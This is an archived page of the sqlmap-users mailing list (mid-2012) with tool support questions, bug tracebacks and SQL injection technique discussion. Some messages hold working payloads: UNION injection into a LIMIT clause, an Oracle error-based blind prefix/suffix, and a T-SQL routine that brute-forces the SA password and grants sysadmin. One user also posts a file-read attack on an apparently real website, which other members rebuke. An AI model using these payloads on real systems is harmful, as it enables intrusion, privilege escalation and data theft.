sqlmap-users Mailing List for sqlmap (Page 52)
Brought to you by:
inquisb
You can subscribe to this list here.
2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: Chris O. <chr...@gm...> - 2012-08-03 16:37:31
|
Thanks Miroslav, I'll give it a go! On 3 August 2012 16:15, Miroslav Stampar <mir...@gm...> wrote: > Hi Chris. > > In those kind of cases UNION injection should be a solution. > > As LIMIT doesn't accept subquery as an operand you have to append a UNION > ALL SELECT to the original value (foo in your case) and necessarily add a > comment to the end (e.g. --) to neutralize that second operand of affected > LIMIT part. > > To make it short, LIMIT doesn't accept subqueries and standard non-UNION > based injection techniques should fail (as they "seed" their payload into > the affected SQL form - in this case LIMIT). > > Kind regards, > Miroslav Stampar > > On Fri, Aug 3, 2012 at 4:08 PM, Chris Oakley <chr...@gm... > > wrote: > >> Hi All >> >> I have found that an application has a rewritten URL element that ends up >> in a SQL query. The error message tells me that I'm injecting into the >> LIMIT number at the end of the query. This appears to be the only point of >> injection for now. >> >> A simplified version of the query that's being injected into is: >> >> SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC, >> created_date DESC LIMIT foo, 10 >> >> 'foo' is my injection and of course gives a syntax error. >> >> I know that apostrophes/ticks (as in the ' character) are blocked as a >> minimum. >> >> Does anyone have any experience injecting this late in a query? Any >> ideas would be greatly received. >> >> Regards >> >> Chris >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > |
From: D A. <je...@ho...> - 2012-08-03 16:37:25
|
hi im try to run sqlmap from msf but i keep getting this error the sqlmap script could not be found: iv already had sqlmap path to system Path envirounment put im still getting this error. can u tell me what i can do from here. Thank you! |
From: Miroslav S. <mir...@gm...> - 2012-08-03 15:15:18
|
Hi Chris. In those kind of cases UNION injection should be a solution. As LIMIT doesn't accept subquery as an operand you have to append a UNION ALL SELECT to the original value (foo in your case) and necessarily add a comment to the end (e.g. --) to neutralize that second operand of affected LIMIT part. To make it short, LIMIT doesn't accept subqueries and standard non-UNION based injection techniques should fail (as they "seed" their payload into the affected SQL form - in this case LIMIT). Kind regards, Miroslav Stampar On Fri, Aug 3, 2012 at 4:08 PM, Chris Oakley <chr...@gm...>wrote: > Hi All > > I have found that an application has a rewritten URL element that ends up > in a SQL query. The error message tells me that I'm injecting into the > LIMIT number at the end of the query. This appears to be the only point of > injection for now. > > A simplified version of the query that's being injected into is: > > SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC, > created_date DESC LIMIT foo, 10 > > 'foo' is my injection and of course gives a syntax error. > > I know that apostrophes/ticks (as in the ' character) are blocked as a > minimum. > > Does anyone have any experience injecting this late in a query? Any ideas > would be greatly received. > > Regards > > Chris > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Chris O. <chr...@gm...> - 2012-08-03 14:08:41
|
Hi All I have found that an application has a rewritten URL element that ends up in a SQL query. The error message tells me that I'm injecting into the LIMIT number at the end of the query. This appears to be the only point of injection for now. A simplified version of the query that's being injected into is: SELECT * FROM posts WHERE site_id = '1' ORDER BY post_date DESC, created_date DESC LIMIT foo, 10 'foo' is my injection and of course gives a syntax error. I know that apostrophes/ticks (as in the ' character) are blocked as a minimum. Does anyone have any experience injecting this late in a query? Any ideas would be greatly received. Regards Chris |
From: M Z. <rob...@gm...> - 2012-08-02 11:18:04
|
I often redirect sqlmap output to a text file with the command >, and that leave annoying marks like [0m [31m at the beginning and the end of lines, and I have to clean that out. Is there a way to disable output coloring? |
From: Miroslav S. <mir...@gm...> - 2012-07-30 11:14:41
|
Hi Jorge. Dennis is right. Posting real targets on this ML is considered as an inappropriate. In your case you are most probably having problems with backend DBMS permissions as in majority of similar cases. In such cases switches -t and/or --parse-errors are great for debugging purposes. Kind regards, Miroslav Stampar On Mon, Jul 30, 2012 at 8:59 AM, Dennis <kor...@ya...> wrote: > Hi Jorge, > > please do not post any vulnerabilities of real web pages to the mailing > list. Could get you or anyone replying into trouble. > > Cheers, > Dennis > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
From: Dennis <kor...@ya...> - 2012-07-30 06:59:59
|
Hi Jorge, please do not post any vulnerabilities of real web pages to the mailing list. Could get you or anyone replying into trouble. Cheers, Dennis |
From: Jorge V. <jv...@co...> - 2012-07-30 02:53:35
|
Hi, great tool. I could never read or write a file on the server, I don't know why. For example this vulnerable web: python sqlmap.py -u "http://www.redpat.tv/php/multimedia/p3.php?codigo=REEL" --file-read "/www/redpat.tv/htdocs/php/multimedia/p3.php" -v 5 It return the error: /www/redpat.tv/htdocs/php/multimedia/p3.php file saved to: 'None' If you go to: http://www.redpat.tv/php/multimedia/p3.php?codigo=REEL' you can see selecting to see the text, that the path on the server is right, thanks to the error message. Hope you can help me, thanks. Jorge Vespa COTASnet 3862818 Santa Cruz - Bolivia |
From: Miroslav S. <mir...@gm...> - 2012-07-29 15:34:50
|
Hi. Thank you for your report and find it fixed with the latest commit [1]. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/126 On Sat, Jul 28, 2012 at 1:33 PM, M Zverev <rob...@gm...> wrote: > [15:12:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev-dba0a96, > retry your run with the latest development version from the G > itHub repository. If the exception persists, please send by e-mail to > 'sql...@li...' or open a new issue at > 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following > text and any information required to reproduce the bug. Th > e developers will try to reproduce the bug, fix it accordingly and get > back to you. > sqlmap version: 1.0-dev-dba0a96 > Python version: 2.7.3 > Operating system: nt > Command line: d:\Soft\sqlmap-dev\sqlmap.py -c x --dbs -u > *************************************** -D ****** -T *********** --dump > Technique: UNION > Back-end DBMS: MySQL (fingerprinted) > Traceback (most recent call last): > File "d:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main > start() > File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 571, in > start > action() > File "d:\Soft\sqlmap-dev\lib\controller\action.py", line 110, in action > conf.dbmsHandler.dumpTable() > File "d:\Soft\sqlmap-dev\plugins\generic\enumeration.py", line 1634, > in dumpTable > entries = inject.getValue(query, blind=False, dump=True) > File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 400, in getValue > value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL > else query, unpack, dump) > File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 354, in __goInband > output = unionUse(expression, unpack=unpack, dump=dump) > File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 345, in > unionUse > value = __oneShotUnionUse(expression, unpack) > File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 83, in > __oneShotUnionUse > if kb.chars.stop not in page and kb.chars.stop[:-1] in page: > TypeError: argument of type 'NoneType' is not iterable > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
From: M Z. <rob...@gm...> - 2012-07-28 11:34:21
|
[15:12:16] [CRITICAL] unhandled exception in sqlmap/1.0-dev-dba0a96, retry your run with the latest development version from the G itHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. Th e developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev-dba0a96 Python version: 2.7.3 Operating system: nt Command line: d:\Soft\sqlmap-dev\sqlmap.py -c x --dbs -u *************************************** -D ****** -T *********** --dump Technique: UNION Back-end DBMS: MySQL (fingerprinted) Traceback (most recent call last): File "d:\Soft\sqlmap-dev\_sqlmap.py", line 72, in main start() File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 571, in start action() File "d:\Soft\sqlmap-dev\lib\controller\action.py", line 110, in action conf.dbmsHandler.dumpTable() File "d:\Soft\sqlmap-dev\plugins\generic\enumeration.py", line 1634, in dumpTable entries = inject.getValue(query, blind=False, dump=True) File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 400, in getValue value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) File "d:\Soft\sqlmap-dev\lib\request\inject.py", line 354, in __goInband output = unionUse(expression, unpack=unpack, dump=dump) File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 345, in unionUse value = __oneShotUnionUse(expression, unpack) File "d:\Soft\sqlmap-dev\lib\techniques\union\use.py", line 83, in __oneShotUnionUse if kb.chars.stop not in page and kb.chars.stop[:-1] in page: TypeError: argument of type 'NoneType' is not iterable |
From: Miroslav S. <mir...@gm...> - 2012-07-28 09:56:27
|
Hi. We have something similar already covered, but your payload is original for sure. We'll probably include it as a standard one. Will let you know. Kind regards, Miroslav Stampar On Thu, Jul 26, 2012 at 11:02 AM, whp <wh...@po...> wrote: > Hi list/developer > > I stumbled over this type of injection while doing a pentest and thought of > implementing this kind of injection in sqlmap (I call is > "error-based-blind-injection"): > > The Webapp replied with "success", if the statement was correct, > regardless of > the number of returned rows (the rows actually were fetched in a subsequent > request). And with an empty respons, if the statement failed. So the > attack was > identified the following way (It is a Oracle DB): > > param=' and to_char(1/0) like '1 --> empty response because 1/0 is a > devision > by zero error > param=' and to_char(1/1) like '1 --> success > > Now I had to find a workaround to get sqlmap to identify this injection (it > only identified a time based blind, but I wanted a _fast_ attack) > > My solution: > prefix= ' and to_char(1/(case (select 'a' from dual where 1=1 > suffix= ) when 'a' then '1' else '0' end)) like '1 > > Know my question: is it possible to get this attack in sqlmap as a standard > attack - or is there an easier way to configure sqlmap? > > Additionaly the oracle -"order by" clause injection via a case-statement > would > be interesting. > > Your opinions/suggestions? > > Chris > -- > whp_at_pohlcity_dot_de > > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-07-27 08:56:41
|
Hi Daniel. This is most probably because "Hebrew" was not recognized as a proper charset there, hence proper decoding could not been done Could you please send more information (maybe in private)? Traffic file (-t traffic.txt) could be enough. Kind regards, Miroslav Stampar On Fri, Jul 27, 2012 at 7:48 AM, Daniel Shapira <don...@gm...>wrote: > hey, > i have a strange problem on data retrieving with Mycrosoft SQL server - > error based > i use this command python sqlmap.py --risk=3 --level=5 -u "www.test.com" > -p x --threads=10 --dump-all --random-agent -o --flush-session > --technique=EUS > > now some of the data is good > but parts of some data comes out like this: > [08:46:23] [INFO] retrieved: \\xe2\\xec\\xe9\\xf7\\xf1\\xe1\\xf8\\xe2 > > i should point the the site is on Hebrew > so the data also may be hebrew so i assumed that maybe the terminal can't > display it but it is the same on the log files > what can be the problem? > thanks > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
From: Daniel S. <don...@gm...> - 2012-07-27 05:49:04
|
hey, i have a strange problem on data retrieving with Mycrosoft SQL server - error based i use this command python sqlmap.py --risk=3 --level=5 -u "www.test.com" -p x --threads=10 --dump-all --random-agent -o --flush-session --technique=EUS now some of the data is good but parts of some data comes out like this: [08:46:23] [INFO] retrieved: \\xe2\\xec\\xe9\\xf7\\xf1\\xe1\\xf8\\xe2 i should point the the site is on Hebrew so the data also may be hebrew so i assumed that maybe the terminal can't display it but it is the same on the log files what can be the problem? thanks |
From: whp <wh...@po...> - 2012-07-26 09:27:00
|
Hi list/developer I stumbled over this type of injection while doing a pentest and thought of implementing this kind of injection in sqlmap (I call is "error-based-blind-injection"): The Webapp replied with "success", if the statement was correct, regardless of the number of returned rows (the rows actually were fetched in a subsequent request). And with an empty respons, if the statement failed. So the attack was identified the following way (It is a Oracle DB): param=' and to_char(1/0) like '1 --> empty response because 1/0 is a devision by zero error param=' and to_char(1/1) like '1 --> success Now I had to find a workaround to get sqlmap to identify this injection (it only identified a time based blind, but I wanted a _fast_ attack) My solution: prefix= ' and to_char(1/(case (select 'a' from dual where 1=1 suffix= ) when 'a' then '1' else '0' end)) like '1 Know my question: is it possible to get this attack in sqlmap as a standard attack - or is there an easier way to configure sqlmap? Additionaly the oracle -"order by" clause injection via a case-statement would be interesting. Your opinions/suggestions? Chris -- whp_at_pohlcity_dot_de |
From: Dennis <kor...@ya...> - 2012-07-25 12:17:29
|
Hey, haven't spent any thinking on a generic approach yet as I was on an Oracle DBMS and did fine. But I see your point... I will give it a thought... Cheers, Dennis Am 25.07.2012 12:09, schrieb Miroslav Stampar: > Hi again. > > Most generic approach would be to use dummy prefix as "99999 WHERE > 1=1", but there are lots of potential pitfalls here (e.g. if column > name is delimited with a DBMS specific column name delimiter). We've > added a new issue for this [1]. > > Kind regards, > Miroslav Stampar > > [1] https://github.com/sqlmapproject/sqlmap/issues/120 > > On Wed, Jul 25, 2012 at 11:47 AM, Miroslav Stampar > <mir...@gm... <mailto:mir...@gm...>> wrote: > > Hi. > > How would you exploit this: > > SELECT $_GET['id'] FROM table > > on all DBMSes? > > Oracle and MySQL have DUAL but what with others? At the end we'll > end with 10 new payloads and/or boundaries each of those covering > each DBMS. > > Kind regards, > Miroslav Stampar > > > On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya... > <mailto:kor...@ya...>> wrote: > > I'm not sure about Troy, but I had a similar case recently. I > could control the bit of the query between SELECT and FROM, > which could be exploited either with nested (SELECT)s or by > expanding the query with another FROM [...] UNION SELECT [...] > to extend the query. SQLmap did not find the injection. The > DBMS was Oracle. > > Cheers > > > Am 25.07.2012 00 <tel:25.07.2012%2000>:48, schrieb Miroslav > Stampar: >> >> Hi Troy. >> >> More info is required for sure. >> >> You mean that you just need a (SELECT...)/subquery type of >> injection? This is something that we are aware that we need >> to do. >> >> Kind regards, >> Miroslav Stampar >> >> On Jul 24, 2012 11:18 PM, "Troy B" >> <pow...@gm... >> <mailto:pow...@gm...>> wrote: >> >> Evening all, >> >> I had an SQL injection into a MySQL5-based web >> application the other week which involved me having >> control over the column list being selected. I tried >> sqlmap against the URL, but it didn't find the injection >> point. I tried again, taking the --level and --risk a >> little higher, but still nothing. >> >> In the end, I manually exploited it using a sub-select. >> Was I doing something wrong with sqlmap, or will it not >> identify injection points like that? I can provide an >> example of the query the application was using if this helps. >> >> Regards, >> >> Matt >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's >> security and >> threat landscape has changed and how IT managers can >> respond. Discussions >> will include endpoint security, mobile security and the >> latest in malware >> threats. >> http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> <mailto:sql...@li...> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> >> >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... <mailto:sql...@li...> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > -- > Miroslav Stampar > http://about.me/stamparm |
From: Bernardo D. A. G. <ber...@gm...> - 2012-07-25 10:44:39
|
Hi Juan, master.dbo.xp_execresultset is a stored extended procedure available on Microsoft SQL Server 2000. It is not availabe on MSSQL 2005/2008 onwards by default, hence the error message and the DBA brute force attack fails. Bernardo On 24 July 2012 14:26, juan molina <j.m...@gm...> wrote: > I was trying sqlninja. > > this is the query it use for bruteforce SA password with 1 character > (numbers and letters). > > declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q nvarchar > (4000) set @a=1 set @s=N'abcdefghijklmnopqrstuvwxyz0123456789' while @a<37 > begin set @p=N'' set @z = substring(@s,@a,1) if @z='''' set @z='''''' set > @p=@p+@z set @q=N'select 1 from > OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select > 1;exec master.dbo.sp_addsrvrolemember > '''''+system_user+N''''',''''sysadmin'''' '')' exec > master.dbo.xp_execresultset @q,N'master' set @a=@a+1 end set @a=1 > > but I am receiving this error: > > > Could not find stored procedure 'master.dbo.xp_execresultset'. > > it was in the HTTP response. this error is because the "openrowset" is > disable? or is just that the "SA" password is not the correct. (like > "password wrong" error). > > there is any way to check if "openrowset" is enable? > > > thanks. > > > > On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G. > <ber...@gm...> wrote: >> >> Hi Juan, >> >> Microsoft SQL Server has a built-in function called OPENROWSET to >> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley >> released a paper demonstrating how to abuse this function to perform a >> DBMS user's password brute-force attack within the MSSQL instance. A >> few years later the attack has been automated in sqlninja[1]. >> We have an issue open on GitHub[2] to implement the same DBA password >> brute-force attack. We have the required code in place, see issue >> #34[3] and will soon close the whole thing. >> >> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL >> 2005 RTM it is disabled by thereforce, hence either the database >> administrator has manually enabled it, or you won't be able to abuse >> this function to brute-force the 'sa' (DBA) password hash or run >> statements on his behalf. >> >> [1] http://sqlninja.sourceforge.net >> [2] https://github.com/sqlmapproject/sqlmap/issues/31 >> [3] https://github.com/sqlmapproject/sqlmap/issues/34 >> >> Regards, >> Bernardo >> >> >> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote: >> > there is a way for bruteforce the SA password using SQL INJECTION? >> > >> > this is the Scenario. it is a DataBase Server (Sql Server 2008) without >> > access to the internet (it has the 1433 port blocked), >> > the current user is a normal user (low privileges User). cannot get SA >> > hash >> > password. >> > >> > the question is, is there any tool or code or way to bruteforce the SA >> > password? without direct access to the Sql Server? >> > >> > It is a request for add this functionality to SQLMAP, I don't know if is >> > possible. >> > >> > Thanks. >> > >> > >> > ------------------------------------------------------------------------------ >> > Live Security Virtual Conference >> > Exclusive live event will cover all the ways today's security and >> > threat landscape has changed and how IT managers can respond. >> > Discussions >> > will include endpoint security, mobile security and the latest in >> > malware >> > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> > _______________________________________________ >> > sqlmap-users mailing list >> > sql...@li... >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) |
From: Miroslav S. <mir...@gm...> - 2012-07-25 10:10:04
|
Hi again. Most generic approach would be to use dummy prefix as "99999 WHERE 1=1", but there are lots of potential pitfalls here (e.g. if column name is delimited with a DBMS specific column name delimiter). We've added a new issue for this [1]. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/120 On Wed, Jul 25, 2012 at 11:47 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi. > > How would you exploit this: > > SELECT $_GET['id'] FROM table > > on all DBMSes? > > Oracle and MySQL have DUAL but what with others? At the end we'll end with > 10 new payloads and/or boundaries each of those covering each DBMS. > > Kind regards, > Miroslav Stampar > > > On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya...> wrote: > >> I'm not sure about Troy, but I had a similar case recently. I could >> control the bit of the query between SELECT and FROM, which could be >> exploited either with nested (SELECT)s or by expanding the query with >> another FROM [...] UNION SELECT [...] to extend the query. SQLmap did not >> find the injection. The DBMS was Oracle. >> >> Cheers >> >> >> Am 25.07.2012 00:48, schrieb Miroslav Stampar: >> >> Hi Troy. >> >> More info is required for sure. >> >> You mean that you just need a (SELECT...)/subquery type of injection? >> This is something that we are aware that we need to do. >> >> Kind regards, >> Miroslav Stampar >> On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> >> wrote: >> >>> Evening all, >>> >>> I had an SQL injection into a MySQL5-based web application the other >>> week which involved me having control over the column list being selected. >>> I tried sqlmap against the URL, but it didn't find the injection point. I >>> tried again, taking the --level and --risk a little higher, but still >>> nothing. >>> >>> In the end, I manually exploited it using a sub-select. Was I doing >>> something wrong with sqlmap, or will it not identify injection points like >>> that? I can provide an example of the query the application was using if >>> this helps. >>> >>> Regards, >>> >>> Matt >>> >>> >>> ------------------------------------------------------------------------------ >>> Live Security Virtual Conference >>> Exclusive live event will cover all the ways today's security and >>> threat landscape has changed and how IT managers can respond. Discussions >>> will include endpoint security, mobile security and the latest in malware >>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> >> >> >> _______________________________________________ >> sqlmap-users mailing lis...@li...https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2012-07-25 09:47:55
|
Hi. How would you exploit this: SELECT $_GET['id'] FROM table on all DBMSes? Oracle and MySQL have DUAL but what with others? At the end we'll end with 10 new payloads and/or boundaries each of those covering each DBMS. Kind regards, Miroslav Stampar On Wed, Jul 25, 2012 at 11:28 AM, Dennis <kor...@ya...> wrote: > I'm not sure about Troy, but I had a similar case recently. I could > control the bit of the query between SELECT and FROM, which could be > exploited either with nested (SELECT)s or by expanding the query with > another FROM [...] UNION SELECT [...] to extend the query. SQLmap did not > find the injection. The DBMS was Oracle. > > Cheers > > > Am 25.07.2012 00:48, schrieb Miroslav Stampar: > > Hi Troy. > > More info is required for sure. > > You mean that you just need a (SELECT...)/subquery type of injection? This > is something that we are aware that we need to do. > > Kind regards, > Miroslav Stampar > On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm...> > wrote: > >> Evening all, >> >> I had an SQL injection into a MySQL5-based web application the other >> week which involved me having control over the column list being selected. >> I tried sqlmap against the URL, but it didn't find the injection point. I >> tried again, taking the --level and --risk a little higher, but still >> nothing. >> >> In the end, I manually exploited it using a sub-select. Was I doing >> something wrong with sqlmap, or will it not identify injection points like >> that? I can provide an example of the query the application was using if >> this helps. >> >> Regards, >> >> Matt >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > > _______________________________________________ > sqlmap-users mailing lis...@li...https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > -- Miroslav Stampar http://about.me/stamparm |
From: Dennis <kor...@ya...> - 2012-07-25 09:28:37
|
I'm not sure about Troy, but I had a similar case recently. I could control the bit of the query between SELECT and FROM, which could be exploited either with nested (SELECT)s or by expanding the query with another FROM [...] UNION SELECT [...] to extend the query. SQLmap did not find the injection. The DBMS was Oracle. Cheers Am 25.07.2012 00:48, schrieb Miroslav Stampar: > > Hi Troy. > > More info is required for sure. > > You mean that you just need a (SELECT...)/subquery type of injection? > This is something that we are aware that we need to do. > > Kind regards, > Miroslav Stampar > > On Jul 24, 2012 11:18 PM, "Troy B" <pow...@gm... > <mailto:pow...@gm...>> wrote: > > Evening all, > > I had an SQL injection into a MySQL5-based web application the > other week which involved me having control over the column list > being selected. I tried sqlmap against the URL, but it didn't > find the injection point. I tried again, taking the --level and > --risk a little higher, but still nothing. > > In the end, I manually exploited it using a sub-select. Was I > doing something wrong with sqlmap, or will it not identify > injection points like that? I can provide an example of the query > the application was using if this helps. > > Regards, > > Matt > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. > Discussions > will include endpoint security, mobile security and the latest in > malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > <mailto:sql...@li...> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > > > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
From: Chris O. <chr...@gm...> - 2012-07-25 09:16:00
|
